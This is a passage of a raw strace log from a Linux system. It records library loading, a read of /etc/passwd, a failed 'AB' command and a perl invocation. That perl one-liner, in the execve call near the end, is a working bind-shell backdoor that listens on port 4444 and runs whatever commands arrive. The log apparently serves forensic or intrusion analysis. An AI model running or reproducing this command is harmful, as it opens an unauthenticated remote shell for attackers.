\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

7608  07:19:33.716653 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

7608  07:19:33.716670 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dcb000

7608  07:19:33.716681 mmap2(0xb7dd2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7dd2000

7608  07:19:33.716698 close(1)          = 0

7608  07:19:33.716709 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7608  07:19:33.716722 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

7608  07:19:33.716736 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

7608  07:19:33.716822 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

7608  07:19:33.716839 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db3000

7608  07:19:33.716850 mmap2(0xb7dc7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7dc7000

7608  07:19:33.716865 mmap2(0xb7dc9000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dc9000

7608  07:19:33.716883 close(1)          = 0

7608  07:19:33.716956 munmap(0xb7f59000, 29913) = 0

7608  07:19:33.717010 open("/etc/ld.so.cache", O_RDONLY) = 1

7608  07:19:33.717023 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7608  07:19:33.717039 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f59000

7608  07:19:33.717050 close(1)          = 0

7608  07:19:33.717060 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7608  07:19:33.717074 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

7608  07:19:33.717088 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7608  07:19:33.717176 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

7608  07:19:33.717193 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da9000

7608  07:19:33.717204 mmap2(0xb7db1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7db1000

7608  07:19:33.717220 close(1)          = 0

7608  07:19:33.717233 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7608  07:19:33.717246 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

7608  07:19:33.717260 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7608  07:19:33.717346 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

7608  07:19:33.717363 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d9e000

7608  07:19:33.717374 mmap2(0xb7da7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7da7000

7608  07:19:33.717391 close(1)          = 0

7608  07:19:33.717464 munmap(0xb7f59000, 29913) = 0

7608  07:19:33.717519 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

7608  07:19:33.717553 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

7608  07:19:33.717579 _llseek(1, 0, [0], SEEK_CUR) = 0

7608  07:19:33.717610 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

7608  07:19:33.717677 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f60000

7608  07:19:33.717707 _llseek(1, 1624, [1624], SEEK_SET) = 0

7608  07:19:33.717754 munmap(0xb7f60000, 1624) = 0

7608  07:19:33.717765 close(1)          = 0

7608  07:19:33.717793 getpgrp()         = 3831

7608  07:19:33.717804 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

7608  07:19:33.717833 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

7608  07:19:33.717849 brk(0x8101000)    = 0x8101000

7608  07:19:33.717887 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7608  07:19:33.717904 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7608  07:19:33.717918 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7608  07:19:33.717955 brk(0x8102000)    = 0x8102000

7608  07:19:33.717981 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7608  07:19:33.718000 stat64("/sbin/AB", 0xbff01558) = -1 ENOENT (No such file or directory)

7608  07:19:33.718012 stat64("/bin/AB", 0xbff01558) = -1 ENOENT (No such file or directory)

7608  07:19:33.718023 stat64("/usr/sbin/AB", 0xbff01558) = -1 ENOENT (No such file or directory)

7608  07:19:33.718034 stat64("/usr/bin/AB", 0xbff01558) = -1 ENOENT (No such file or directory)

7608  07:19:33.718047 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7608  07:19:33.718062 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dd46f8) = 7609

7609  07:19:33.734200 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7609  07:19:33.734223 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7609  07:19:33.734237 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7609  07:19:33.734250 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7609  07:19:33.734266 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7609  07:19:33.734282 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7609  07:19:33.734295 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7609  07:19:33.734358 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

7609  07:19:33.734373 --- SIGPIPE (Broken pipe) @ 0 (0) ---

7609  07:19:33.734451 exit_group(127)   = ?

4519  07:19:33.745033 waitpid(7608,  <unfinished ...>

7608  07:19:33.774407 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7608  07:19:33.774407 --- SIGCHLD (Child exited) @ 0 (0) ---

7608  07:19:33.774407 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 7609

7608  07:19:33.774407 waitpid(-1, 0xbff011d8, WNOHANG) = -1 ECHILD (No child processes)

7608  07:19:33.774407 sigreturn()       = ? (mask now [])

7608  07:19:33.774408 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7608  07:19:33.774408 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7608  07:19:33.774408 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7608  07:19:33.774408 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

7608  07:19:33.774421 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7608  07:19:33.774433 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

7608  07:19:33.774469 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7608  07:19:33.774490 stat64("/sbin/perl", 0xbff01588) = -1 ENOENT (No such file or directory)

7608  07:19:33.774502 stat64("/bin/perl", 0xbff01588) = -1 ENOENT (No such file or directory)

7608  07:19:33.774514 stat64("/usr/sbin/perl", 0xbff01588) = -1 ENOENT (No such file or directory)

7608  07:19:33.774525 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7608  07:19:33.774543 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7608  07:19:33.774569 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7608  07:19:33.774583 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dd46f8) = 7610

7610  07:19:33.774714 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7610  07:19:33.774731 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7610  07:19:33.774745 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7610  07:19:33.774757 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7610  07:19:33.774785 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7610  07:19:33.774807 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7610  07:19:33.774820 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7610  07:19:33.774854 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

7610  07:19:33.774941 brk(0)            = 0x8153000

7610  07:19:33.774961 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7610  07:19:33.774977 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fbb000

7610  07:19:33.774993 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7610  07:19:33.775010 open("/etc/ld.so.cache", O_RDONLY) = 1

7610  07:19:33.775023 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7610  07:19:33.775041 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fb3000

7610  07:19:33.775051 close(1)          = 0

7610  07:19:33.775062 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7610  07:19:33.775077 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7610  07:19:33.775091 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7610  07:19:33.775225 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7610  07:19:33.775243 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7faf000

7610  07:19:33.775255 mmap2(0xb7fb1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7fb1000

7610  07:19:33.775271 close(1)          = 0

7610  07:19:33.775282 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7610  07:19:33.775296 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

7610  07:19:33.775310 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

7610  07:19:33.775400 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

